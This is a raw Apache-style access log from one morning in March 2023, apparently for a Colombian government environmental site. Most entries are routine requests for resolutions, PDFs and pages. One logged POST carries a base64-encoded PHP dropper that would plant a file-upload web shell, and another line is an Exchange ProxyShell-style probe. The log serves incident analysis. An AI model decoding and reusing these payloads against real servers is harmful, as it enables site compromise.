201.244.117.231 - - [26/Mar/2023:11:06:46 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
201.244.117.231 - - [26/Mar/2023:11:06:46 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
201.244.117.231 - - [26/Mar/2023:11:06:47 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
201.244.117.231 - - [26/Mar/2023:11:06:47 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
192.168.175.240 - - [26/Mar/2023:11:07:18 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:11:08:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:08:37 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
52.188.77.43 - - [26/Mar/2023:11:08:53 -0500] "GET /images/Foto%20Di%C3%8C%C2%81a%20Mundial%20del%20Agua%20(1)%20(1).jpeg HTTP/1.1" 200 41770
172.22.2.4 - - [26/Mar/2023:11:07:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49099
172.22.2.4 - - [26/Mar/2023:11:07:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:11:09:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:09:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
172.22.2.4 - - [26/Mar/2023:11:08:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
216.245.221.92 - - [26/Mar/2023:11:09:54 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:11:10:18 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:11:11:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:11:20 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
201.245.192.253 - - [26/Mar/2023:11:11:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
45.238.182.7 - - [26/Mar/2023:11:12:06 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
192.168.175.240 - - [26/Mar/2023:11:12:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:12:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 359935
52.167.144.167 - - [26/Mar/2023:11:12:22 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 10548
181.53.13.252 - - [26/Mar/2023:11:12:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
45.79.181.223 - - [26/Mar/2023:11:12:49 -0500] "\x16\x03\x01" 400 226
192.168.175.240 - - [26/Mar/2023:11:13:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:13:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
52.167.144.167 - - [26/Mar/2023:11:13:52 -0500] "GET /Publicaciones/2022EE24916.pdf HTTP/1.1" 404 227
192.168.175.240 - - [26/Mar/2023:11:14:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:11:13:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [26/Mar/2023:11:14:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Mar/2023:11:15:01 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=6786&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1157
192.168.175.240 - - [26/Mar/2023:11:15:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:11:14:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [26/Mar/2023:11:16:18 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:11:16:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [26/Mar/2023:11:17:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:18:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
192.168.175.240 - - [26/Mar/2023:11:18:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:18:56 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
192.168.175.240 - - [26/Mar/2023:11:19:18 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [26/Mar/2023:11:19:54 -0500] "HEAD / HTTP/1.1" 200 -
181.53.13.252 - - [26/Mar/2023:11:20:04 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
201.245.192.253 - - [26/Mar/2023:11:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41153
201.245.192.253 - - [26/Mar/2023:11:20:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43462
192.168.175.240 - - [26/Mar/2023:11:20:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:20:30 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
172.22.2.4 - - [26/Mar/2023:11:19:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:11:21:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:11:19:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
181.53.13.252 - - [26/Mar/2023:11:21:36 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
201.245.192.253 - - [26/Mar/2023:11:21:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [26/Mar/2023:11:22:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:22:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 359935
52.167.144.71 - - [26/Mar/2023:11:22:30 -0500] "GET /BLA/resoluciones/AUTOS%202018/6044.pdf HTTP/1.1" 200 273530
181.53.13.252 - - [26/Mar/2023:11:22:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
128.14.136.18 - - [26/Mar/2023:11:23:07 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [26/Mar/2023:11:23:18 -0500] "GET / HTTP/1.1" 200 4720
186.84.20.209 - - [26/Mar/2023:11:23:19 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 888406
181.53.13.252 - - [26/Mar/2023:11:23:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
181.53.13.252 - - [26/Mar/2023:11:24:08 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:11:24:18 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [26/Mar/2023:11:24:54 -0500] "HEAD / HTTP/1.1" 200 -
138.2.9.189 - - [26/Mar/2023:11:25:05 -0500] "POST //wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1BEOXdhSEFnWldOb2J5QW5QSEJ5WlQ0bkxuQm9jRjkxYm1GdFpTZ3BMaUpjYmlJdUp6eGljaTgrUEdadmNtMGdiV1YwYUc5a1BTSndiM04wSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaVgxOGlQanhwYm5CMWRDQnVZVzFsUFNKZklpQjBlWEJsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pWY0d4dllXUWlQand2Wm05eWJUNG5PMmxtS0NSZlVFOVRWQ2w3YVdZb1FHTnZjSGtvSkY5R1NVeEZVMXNuWDE4blhWc25kRzF3WDI1aGJXVW5YU3dnSkY5R1NVeEZVMXNuWDE4blhWc25ibUZ0WlNkZEtTbDdaV05vYnlBblQwc25PMzFsYkhObGUyVmphRzhnSjBWU0p6dDlmVDgrJzsKICAkZm4gPSAndXBsb2FkZXIucGhwJzsKICBpZiggZnVuY3Rpb25fZXhpc3RzKCdmaWxlX3B1dF9jb250ZW50cycpICkgewogICAgZmlsZV9wdXRfY29udGVudHMoJGZuLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogIH1lbHNlewogICAgQHRvdWNoKCRmbik7CiAgICBpZighJGZvID0gZm9wZW4oJGZuLCAnYScpKSB7CiAgICAgIGVjaG8gJ2Vycm9yJzsKICAgICAgZXhpdDsKICAgIH07CiAgICBmd3JpdGUoJGZvLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogICAgZmNsb3NlKCRmbyk7CiAgfQogIGlmKCBmaWxlX2V4aXN0cygkZm4pICkgewogICAgZWNobyAnYURyaXY0JzsKICAgIGV4aXQ7CiAgfQ== HTTP/1.1" 404 1134
192.168.175.240 - - [26/Mar/2023:11:25:18 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:11:26:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:26:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
172.22.2.4 - - [26/Mar/2023:11:24:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [26/Mar/2023:11:26:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
181.53.13.252 - - [26/Mar/2023:11:27:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
192.168.175.240 - - [26/Mar/2023:11:27:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:11:25:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
192.144.114.138 - - [26/Mar/2023:11:27:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 580582
181.53.13.252 - - [26/Mar/2023:11:28:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:11:28:18 -0500] "GET / HTTP/1.1" 200 4720
173.252.83.116 - - [26/Mar/2023:11:29:02 -0500] "GET /images/calidad-aire-2-marzo-1_optimized.jpeg HTTP/1.1" 200 51562
192.168.175.240 - - [26/Mar/2023:11:29:18 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [26/Mar/2023:11:29:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Mar/2023:11:30:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41153
201.245.192.253 - - [26/Mar/2023:11:30:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43462
192.168.175.240 - - [26/Mar/2023:11:30:18 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:11:31:18 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:11:31:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
52.167.144.165 - - [26/Mar/2023:11:31:40 -0500] "GET /BLA/resoluciones/AUTOS%202015/4280.pdf HTTP/1.1" 200 719771
52.167.144.165 - - [26/Mar/2023:11:31:44 -0500] "GET /BLA/resoluciones/AUTOS%202008/0253.pdf HTTP/1.1" 200 176716
192.168.175.240 - - [26/Mar/2023:11:32:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:11:30:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
179.43.177.242 - - [26/Mar/2023:11:33:01 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [26/Mar/2023:11:31:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
192.168.175.240 - - [26/Mar/2023:11:33:18 -0500] "GET / HTTP/1.1" 200 4720
191.156.248.153 - - [26/Mar/2023:11:33:39 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.156.248.153 - - [26/Mar/2023:11:33:39 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.156.248.153 - - [26/Mar/2023:11:33:39 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
192.168.175.240 - - [26/Mar/2023:11:34:18 -0500] "GET / HTTP/1.1" 200 4720
190.60.254.213 - - [26/Mar/2023:11:34:36 -0500] "GET /%C3%82%C2%BFquieres-aprender-sobre-jardines-verticales-esta-es-tu-oportunidad.html HTTP/1.1" 304 -
216.245.221.92 - - [26/Mar/2023:11:34:54 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:11:35:18 -0500] "GET / HTTP/1.1" 200 4720
190.27.190.227 - - [26/Mar/2023:11:35:24 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/54kufNKD68pE+XuFCRa0Q//dcD57kcV4N3aOye5QN+Lp7xVRae6dQ&y=U2FsdGVkX1+/iIZBFyaksDJAG0ndNj8ItsN2zuB+NAXvEMz3eGFjGhqt9k1Hziu2 HTTP/1.1" 200 31
190.27.190.227 - - [26/Mar/2023:11:35:32 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+BmfYNA7ZIIBQqAvQaYI31oft4bkxLqrfMNBDh0iBwSfJS9HepM7mA&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 30
190.27.190.227 - - [26/Mar/2023:11:35:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/d8m/U0P/SiYo4l43YNuyC9i8Zo9RGY7IZsIgba3BWqhiMwc8VbMINQtSJL7e2+Q+SgWS+vDaBjQT503ZuPxWaO/iQZYwwsqY=&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 97
190.27.190.227 - - [26/Mar/2023:11:35:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+JnVZbIH6SxfecZTorj3xwedxR9vLNbN981z3A+51mDqgMnxZfqmDLbYiBUidDyn6GRj4ev3e70SXhFERAHCTC4P6U4+oAIKa7y3BNndrKJM0iOO9gq9acK1qQOVfXaZC5SXPYJLS5w+HoJGANvl4b5oN9mUiSzbSbp3pMhtSPV1qEmDuG7CHotSl6DJL2kM3YtTHVa/VctNUKDxPbnxTLQKckA+F/BmfiexWYGnqm2rSbg9mlnWZdaNgYGW/mg6wVNvey4+3NIDtDvSXycwFOHnwBxvhNytMNfUKPS8EM4oMD4NeBqzC1+ZTzwLzrQbOUa5fHYr6k36tEQHkRw6vaRvbgHFGAI56fIdvTagSTRbfWE2wzNAGGiI4O3jUvG6JSQr4QwelMsdYEu12bJxQzeCo7k+dQr+RkXPTXRd5mv0zracFpuhv3XnDUNN9dPF12ZcG9+ZOaLxKBgXaWK3B5Wl5waVQuPMZ3EsZamalLGAqkeAbghHjl6MN5gtndQlMcN/fgQirtCnN1PUpR0cS/il0qDWppY5vDoksNKvrgNxBhBuTHaOwinbjRb+A28ZSBhek/++cbfVt/pkuTjrynncR1hcS9Cz10/nw87Klgw5rKyxie5pJHLW2SyGLje9oVagQMIdeHp1TmuJj0u7mnMKcFFwqZJDOxuzKgHD9/SYqgQdV0jr95RsSEoNTCCWgCM+irL6VwYBBlCRfzhr+Asw1SsWGW4xnxSMtmWfVJ+JgBl2QPtFiXid5bWsJFFQIQHMbAxpYdn9rwrMem7oUO+p/JcxBrLkeBxKkrggmnaK23kZ+bVHtNUgmaOQo1XpsNT+VJTjl7oKQGreUAwine9EtCCRSQlmdlBFsL4gw7JRZD+67fhu2kiu65/K2cD0UX1B52khMYX6JbLPuk19EoTmShu3NnhsRqJRTZuRVsDKusx+677BFTXlRYdMniGmKQeaMY+DLE1IkaaMrMOXp9wPdZZZCfQXWpSJVfgvga8Q0C23Y4LywFrpqqmeF/JiPCCbDW2e80EWfQXaviWGoHYucoG1N7nLRmNM6XaKnEANxYSXJ26Ve6dcdx+B31g98J2btG3nQrvU7EhIL5JdD4PiTrYDzyk97IPXQVca+ODhI2oNIyzKbSo0jSjxknRfGmvIyk4FVqMzQjfv/urY6F5PfOft2625MRpu14MuyV4wXBUrZXSH4gfp2la155TFN2zHped8HtbJKqBrJFnlvwPD46YIGvM902zFX7D00Fk13L0MGMnl7jvF6WxLCKnVeXa3Ng4NGo6NcChizSlWHdOrafu3sAKwEGIoEbZLS7UEZwpOq5zGZVcgKadRQ7YfbDZ+5rmEj6dPrSTcd3vsyldtXVWYFeFkD1MJUmONpeTwwoNAKi5wfmAoLOZxboqhU1Xk5hTFPrV1utJkn93xciJIeJKogolu3Vyn0vpYoDiFm39uPuiyV3stCfjdCrweozkRmhjWOU2+y+IFrQ5Xg0QLYTH3uH7TEPt0Z6N/yhjMueiZquiHfGApsWsgM2LDjay9RYoXBelSQOBIlJ9K3oPS9KyS8tEWE3EtCQf3T6KKxgG7Dex8xvY/I+22CevvrlEIYx/B+GlvTzsgoXcVIi8J9+gJ34UN39RH9noeaX5hvoJwt1i1cCNadllrMi0VbguweYy9hSMQ7pQkhNwTDtiAa1MwIn4nzcj+j7j+T0vM0yRWAZofAdQFYBJN+a8Q801DpHuUXsIM12ZYGrUYvLQm2taJ9ogBi7Z0agh9CObpVTK3xAe1t/&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 8237
190.27.190.227 - - [26/Mar/2023:11:35:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19hGA7ramGx28qhVNBwizLpvU52Ah3FfVgsbt198My7ceV2iuttA5AKDnlLy9vI7agsvVpfBf2cJT7nrVFqzRnynyWCO67lC8OBmlWoZeRc0rC5WtiLY5Yo1vqOUYkxPgLC7JMX7YBr44u1soecfRZIoadnPH5xe4eRSMLeil/GQAhDZHUX1AZB/TdbZTIsSzFK7yIlVemu4xjMjriusQXgJzNAvJaocO7jl41fzN+KDWXmxva/pm9FmqeCfz4IZkGIwNHhiZqA4UXAGnPfvG2agk7GsNpEGRbUNl0RSIi2lBEAkbeVmUVDQ5pGD0+l7sXcoMvxO1jfW2MuOZ9Dh7bIX9Yq4NPFpRmqWNRxTG+DyUM7XHMmSg88CGgd749LalM5qyyEeVyj4Vusy5Cw1GtE6Y3SZmgwJIQmYcULu7xJgKGitt3jvQZAI7I89lyXnesBz4guG3BRNdS9DmFxZzveeCOKB3M/L4qPP7AnY+dnd5dHJ/sgkykDu2ewy+LW0kGQI1IbUopg598Z/DzqHcMJMh+oNGYpJSrbCYMKSepxouZBbKZjg4MWVFE1oDHsMkio2+dsZtSMNiZDIYaIXVPip9VU8NoRhqVNhNlXn251tbBTrgOfoBY+iTIR58sDjimnagKccsr4hBqERAS7+k8GjsmI8lNRxl4vpYCOQu5EBd+Dkd3J+avTqkYwjnlGk0WFapQKPvz9KwP+Sc9SyPDUgPUuuIPB5/y/j7v8Nk0IHveaRggLUBOOLCv1Ge5Vr5G4AyY/8pjV1A==&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 354
190.27.190.227 - - [26/Mar/2023:11:35:32 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+BmfYNA7ZIIBQqAvQaYI31oft4bkxLqrfMNBDh0iBwSfJS9HepM7mA HTTP/1.1" 200 31032
190.27.190.227 - - [26/Mar/2023:11:35:32 -0500] "GET /kwssiamovil/sm/cjson/pre?f=18&x=U2FsdGVkX1+BmfYNA7ZIIBQqAvQaYI31oft4bkxLqrfMNBDh0iBwSfJS9HepM7mA HTTP/1.1" 200 32849
192.168.175.240 - - [26/Mar/2023:11:36:18 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.113 - - [26/Mar/2023:11:36:32 -0500] "-" 408 -
201.245.192.253 - - [26/Mar/2023:11:36:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
181.53.13.252 - - [26/Mar/2023:11:37:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
192.168.175.240 - - [26/Mar/2023:11:37:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:11:36:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:11:38:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:38:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
172.22.2.4 - - [26/Mar/2023:11:37:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
181.53.13.252 - - [26/Mar/2023:11:39:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 580582
192.168.175.240 - - [26/Mar/2023:11:39:18 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.218 - - [26/Mar/2023:11:39:23 -0500] "GET /distrito-anuncia-areas-potenciales-para-la-creacion-de-21-bosques-urbanos-y-avanza-en-la-meta-de-sembrar-802-000-arboles.html HTTP/1.1" 200 928
181.53.13.252 - - [26/Mar/2023:11:39:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
216.245.221.92 - - [26/Mar/2023:11:39:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Mar/2023:11:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41153
201.245.192.253 - - [26/Mar/2023:11:40:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43462
192.168.175.240 - - [26/Mar/2023:11:40:18 -0500] "GET / HTTP/1.1" 200 4720
186.102.36.169 - - [26/Mar/2023:11:40:23 -0500] "-" 408 -
181.53.13.252 - - [26/Mar/2023:11:40:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
181.53.13.252 - - [26/Mar/2023:11:41:03 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
192.168.175.240 - - [26/Mar/2023:11:41:18 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:11:41:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
172.22.2.4 - - [26/Mar/2023:11:42:14 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [26/Mar/2023:11:42:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:11:42:19 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
192.144.114.138 - - [26/Mar/2023:11:42:21 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
192.168.175.240 - - [26/Mar/2023:11:43:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:43:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
172.22.2.4 - - [26/Mar/2023:11:42:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:11:44:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:44:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
172.22.2.4 - - [26/Mar/2023:11:43:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [26/Mar/2023:11:44:54 -0500] "HEAD / HTTP/1.1" 200 -
161.18.209.11 - - [26/Mar/2023:11:45:04 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
192.168.175.240 - - [26/Mar/2023:11:45:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:45:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 359935
103.162.10.234 - - [26/Mar/2023:11:45:27 -0500] "GET /galeria/galeria/fotos/2humedal-Burro2P.jpg HTTP/1.1" 200 8996
181.53.13.252 - - [26/Mar/2023:11:46:14 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 359935
161.18.209.11 - - [26/Mar/2023:11:46:17 -0500] "GET /BLA/resoluciones/AUTOS%202018/6786.pdf HTTP/1.1" 200 296030
192.168.175.240 - - [26/Mar/2023:11:46:18 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:11:46:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
173.252.79.120 - - [26/Mar/2023:11:46:53 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
181.53.13.252 - - [26/Mar/2023:11:46:55 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
181.53.13.252 - - [26/Mar/2023:11:46:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 359935
190.27.190.227 - - [26/Mar/2023:11:47:07 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
190.27.190.227 - - [26/Mar/2023:11:47:07 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
192.168.175.240 - - [26/Mar/2023:11:47:18 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.130 - - [26/Mar/2023:11:47:35 -0500] "-" 408 -
181.53.13.252 - - [26/Mar/2023:11:47:52 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 359935
172.22.2.4 - - [26/Mar/2023:11:47:54 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 1018
192.168.175.240 - - [26/Mar/2023:11:48:18 -0500] "GET / HTTP/1.1" 200 4720
190.27.190.227 - - [26/Mar/2023:11:48:18 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+C3NsBjVkN41swxSXDbDM+WfelVjnsgBlM49rivpVJ6neL/I6YWnLid3J5VD2/G/YX4I1s+JInujmWDaAECcyLD3ptCe3AjtoAONxMXvbb2WSd8uJYBuRFxWjmZU6et277IbPTjOJgD+OFwSW/uytEUs4b8SkDQYIdESM3+AZd8Ir+WK8txbRZoc7OKzZy8o2bdcexrXx2xfPNnwWvQV5BdBBWpeq70Q4Gik3eAg0fUDoyXWCOgJPYHd/KjH5At0gh/OGiI7iSAQ==&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 26
